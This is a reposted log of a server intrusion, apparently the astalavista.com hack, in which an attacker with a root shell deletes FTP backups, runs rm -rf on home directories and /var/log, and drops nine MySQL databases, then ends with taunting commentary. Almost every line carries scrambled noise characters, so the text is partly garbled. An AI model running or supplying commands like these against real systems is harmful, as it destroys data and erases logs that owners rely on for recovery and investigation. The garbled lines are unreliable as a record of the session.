& e/ U# d' H- q250 CWD command successful." r, p4 K9 \4 |+ J1 T
ftp> ls -la
$ S0 O( I6 t( |227 Entering Passive Mode (212,254,194,163,2,189)
% p$ `1 y p2 p: _2 _) B! M) A150 Opening BINARY mode data connection for ‘file list’.5 F7 v$ ^. J9 l7 ~' E1 X
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
, a, q, q) H8 u: g$ Y4 H- f A6 j-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
" P2 I+ j0 `" L9 Y+ ~" n: \1 M* f-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
/ T( r7 u9 B/ `- R-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
) |- e- q/ z' h% ]: z-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar! [1 }1 F# u6 R7 ^
[snip]/ ]; ~3 n& \9 f9 F5 L2 O
226 Transfer complete.
% Y0 Z' @3 Z7 A3 k% x! wftp> mdelete *
% ^- F1 d( g0 Sftp> ls -la
, Z) M9 E1 a7 ?. K/ I) T227 Entering Passive Mode (212,254,194,163,2,193)
1 y- o4 }; v$ m4 `: w( G8 p150 Opening BINARY mode data connection for ‘file list’.7 M5 p: A" Y+ B8 U. @! `/ X
226 Transfer complete.( r; _% S- h$ G+ d& w" C H% f
ftp>6 }/ z( Q+ w9 q( C
6 C0 d) i1 v dsh-3.2# cd /home) P7 E0 Y$ {3 _ H$ M- X6 d4 ?
sh-3.2# ls -la' ] q+ Q, H0 r. o
total 120% t8 j+ j/ |- y3 r1 {7 }
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
# V" B4 ]% z4 i% f3 Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 C/ Q+ E- k* D. ~3 ?; s" c1 _! adrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
8 Z9 S" B1 `# s+ {) A7 B# e5 [-rw——- 1 root root 8192 Jun 4 03:03 aquota.group- c: m; W8 H. O: V, u
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# ?7 D4 z& @* o* ]
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet' N' s7 y' _, y8 E+ W
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' I& X" i/ x" e+ V# Gdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ q) @+ i! S1 e K
drwx–x–x 10 com com 4096 Apr 28 12:40 com3 q, }; o. ?7 P4 `7 |" Q
drwxr-xr-x 2 root root 4096 May 17 2007 ftp9 P: Y+ A9 Q% q- O6 l
drwx—— 3 jon jon 4096 Sep 21 2007 jon
# } M& [) h! n! Z! y4 Ddrwx—— 2 root root 16384 Sep 11 2007 lost+found' u% f1 ~4 D H+ X3 Y8 w4 V
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
8 ]! m4 W# M; R( c. |drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata' U. y2 g3 }6 N* f$ M
drwx—— 2 jon jon 4096 Sep 15 2007 test& r# U! q/ E/ I H% y1 W2 ?
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
: s1 ]+ r$ j, J8 a" M4 P v5 e/ f) Z
5 X6 P5 c, r/ |9 e& Nsh-3.2# rm -rf backup/4 {) f6 H+ ]% g! n5 c/ J7 O
sh-3.2# rm -rf backup.14161/
% G7 @# B) |8 `# y1 Xsh-3.2# rm -rf ftp/+ ^0 k, t) i* A+ i
sh-3.2# rm -rf jon/
, R' R$ {- F' n" T, I" osh-3.2# rm -rf my/4 E2 m. ?- m, U
sh-3.2# rm -rf mysqldata/3 h; i1 Y4 G0 V
sh-3.2# rm -rf test/
0 O- B! l# P8 l' N4 d2 E$ c& Ksh-3.2# rm -rf tmp/
0 q$ t/ ~1 d1 J5 wsh-3.2# cd ~4 | w1 d- |/ k
sh-3.2# rm -rf *+ W) c! K5 c+ J* B' I0 F, q' G& p
sh-3.2# rm -rf /var/log/
8 ~1 t5 q, r0 v0 irm: cannot remove directory `/var/log//proftpd’: Directory not empty
5 K6 O% c4 j; V8 ?* ssh-3.2# rm -rf /home/*
6 `" W/ C: {4 ssh-3.2# mysql' |1 j+ n4 w! K/ a. U
Welcome to the MySQL monitor. Commands end with ; or \g.
' \- j; ?0 z3 U5 PYour MySQL connection id is 407156
4 l7 u% e, |, QServer version: 5.0.45-community-log MySQL Community Edition (GPL)
8 ?& w$ F) q8 `9 m; R+ S7 x6 k( x5 K& {" W2 S" F2 ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 T- I4 O0 E+ e h. v
% v j* N: c: `1 F& ~+ dmysql> show databases;
3 j5 k+ P. `: s) s' q+———————–+( U7 ~# Z) A S p. `
| Database |
, s, d' g9 {) w0 r) D+———————–+
7 B' Y4 B8 B/ e% `9 X8 G| information_schema |
6 L) [1 y; l' U# u1 w| astanet_ads |4 A; t) E) |# w$ |" W/ U
| astanet_mailing_lists |
5 B9 D" T- ~- I# B) {0 L0 o| astanet_mediawiki |
0 b+ W' P+ i* l( G8 \ u1 n) t| astanet_membersystem |$ y/ [. e3 x9 y3 u
| com_contrexx |% H+ w8 H% C9 p# Y3 E1 ^; }
| com_contrexx2 |
6 T( U, q0 y/ b9 B3 I0 A! M2 i2 l| com_contrexx2_live |- p8 j1 U$ f n( r1 m2 s
| da_roundcube |: O3 S, n! | N' ]. @: U! P/ z% T
| dolphin |0 Y0 D( }( r: d& a' j0 | J! {
| ideapool |) G. m U: }& Z) a* i
| mysql |
8 N; c5 ]4 v) i| test |& a' C/ o! ]& _/ ]; ^* h* y
| yourmaster |
( v0 v. A6 K& p) t, I+———————–+- }/ c/ V% p% v9 p
14 rows in set (0.03 sec)
3 G) t7 I9 F0 a6 O. L' d
B- I- i& U4 h0 `% c: [mysql> drop database astanet_membersystem;
) s# B" K) l' C( B8 u$ E+ C; MdroQuery OK, 46 rows affected (0.81 sec)9 F1 q* u/ ^) B, @* N0 r. K& O, J
7 c7 V! u+ j9 b1 t/ D8 ]1 Xmysql> drop database com_contrexx;
6 j5 _) d, P f+ I; g T% p5 f) YQuery OK, 211 rows affected (2.72 sec)
. i# K4 p0 f+ j
! D: U3 t# N: m/ T, b- Gmysql> drop database com_contrexx2;
# A+ E3 F: ?! Q1 [. IQuery OK, 237 rows affected (2.23 sec)
" q5 ~3 p; H4 N+ _" q/ l. t
# N8 S) u6 M5 m" z6 Qmysql> drop database com_contrexx2_live;5 @ t$ P7 x# t' W# f1 Y
Query OK, 227 rows affected (7.63 sec)% `0 l+ s) i8 {% R" J+ ?
/ B" T' u: q8 jmysql> drop database ideapool;
, D7 o4 q* R: ^1 z: I$ u) ?Query OK, 69 rows affected (0.19 sec)' X: r, t8 l3 G9 H0 n# V" `: p/ A
. A8 ~' v# ~ m$ e8 D" l1 b& Tmysql> drop database yourmaster;
0 F- n5 b" f6 nQuery OK, 158 rows affected (0.55 sec)
' T5 Z4 ?1 }# _/ \ \$ H9 e5 W/ `' g' y. z4 X
mysql> drop database astanet_ads;
. S5 i' h; u, `Query OK, 9 rows affected (0.11 sec)
( P! _9 o/ D$ ?
1 O4 b6 `5 x G' r9 @7 @mysql> drop database astanet_mailing_lists;
5 t7 e6 S& y0 g$ cQuery OK, 24 rows affected (1.47 sec)' j1 @* x" y& I% |
U5 J# d9 {# O+ [* e% \1 d8 amysql> drop database astanet_mediawiki;
: n/ V* d6 D0 M* n5 nQuery OK, 31 rows affected (0.51 sec)
. z9 l5 e! y& ?- N6 F( b. F& L2 l+ b$ p% v& v' M1 f. R
mysql> show databases;
4 W+ g2 `* V$ A( W6 T+——————–+% D' U7 D% q' z8 D
| Database |) r! p' C, q7 W; }
+——————–+
0 \# p) p+ `4 S+ E$ P& }; || information_schema |5 n/ ^. U2 ] }7 \
| da_roundcube |) d) c% d2 T5 T- a7 O- A6 B5 J
| dolphin |3 {) S+ d( A2 a
| mysql |7 U0 [( a0 D: |# J6 ^ q* B
| test |* i0 S% U- u9 N" @' `
+——————–+
# ~, K& T- p. U& N& z' a5 rows in set (0.00 sec)6 S. l- e0 X/ I2 P5 \4 A
2 S( S3 ]" I- `2 B9 o/ b( a" _* j
What a journey! We’re not sure exactly why the “Terminator” had any influence on0 J* \! i% Y3 Y7 R
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
" W) a$ B3 T# r* N ~" Q2 O& m- awrong to say this pack of morons *wont be back*.. @( u0 y) H X r1 M
|
发表于 2012-11-6 21:07:34
收藏
支持
反对